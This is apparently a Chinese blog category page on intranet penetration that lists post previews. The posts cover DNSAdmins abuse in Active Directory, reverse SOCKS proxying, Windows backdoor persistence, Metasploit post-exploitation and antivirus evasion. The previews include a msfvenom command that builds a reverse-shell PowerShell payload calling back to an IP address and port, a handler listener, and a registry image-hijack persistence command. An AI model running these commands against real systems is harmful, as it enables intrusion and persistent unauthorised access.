![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网渗透
PD_3569
这个作者很懒,什么都没留下…
展开
-
在域控中滥用DNSAdmins权限的危害
https://xz.aliyun.com/t/2932翻译自:http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html翻译:聂心明昨天,我读了Shay Ber的文章,感觉非常不错,链接在https://medium.c...转载 2018-10-24 10:28:31 · 651 阅读 · 0 评论 -
[ssocks] 内网 socks 代理
emmm。有了一台 linux 计划任务反弹的shell,socks 搞内网 ~使用方法 就跟 rcsocks 的 help 一样, rsscoks 在target上运行,rcsocks 在 hacker 上运行 // 我用 use 标出来了[root@target src]# ./rcsocks -h./rcsocks -hrcSocks Reverse Client Soc...原创 2018-12-05 10:52:33 · 3204 阅读 · 0 评论 -
windows常见后门隐藏和权限维持方法及排查技术
https://xz.aliyun.com/t/4842这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ...常见backdoor和persistence方式方法系统工具替换后门Image 劫持辅助工具管理器REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\...转载 2019-04-24 23:46:05 · 6591 阅读 · 0 评论 -
msf拿到shell之后的一条龙套餐
生成ps 反弹脚本 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -f psh-reflection>/tmp/search.ps1msf 监听反弹msf > use exploit/multi/handlermsf exploit(ha...转载 2019-08-03 17:58:50 · 6770 阅读 · 1 评论 -
基于 msf 的免杀项目的一些工具
https://mp.weixin.qq.com/s/W7mBroOtVUdMHA7f07J_7Q转载自 信安之路这两个月来 持续的糜烂,乱七八糟的事,在今天lol完觉得不能再浪费时间来Orz,向大神们开始学习来0x02 avet 工具使用此工具当年在 2017 年黑帽大会上惊艳全场,使用 kali 下载:git clonehttps://github.c...转载 2019-08-01 21:39:59 · 4561 阅读 · 1 评论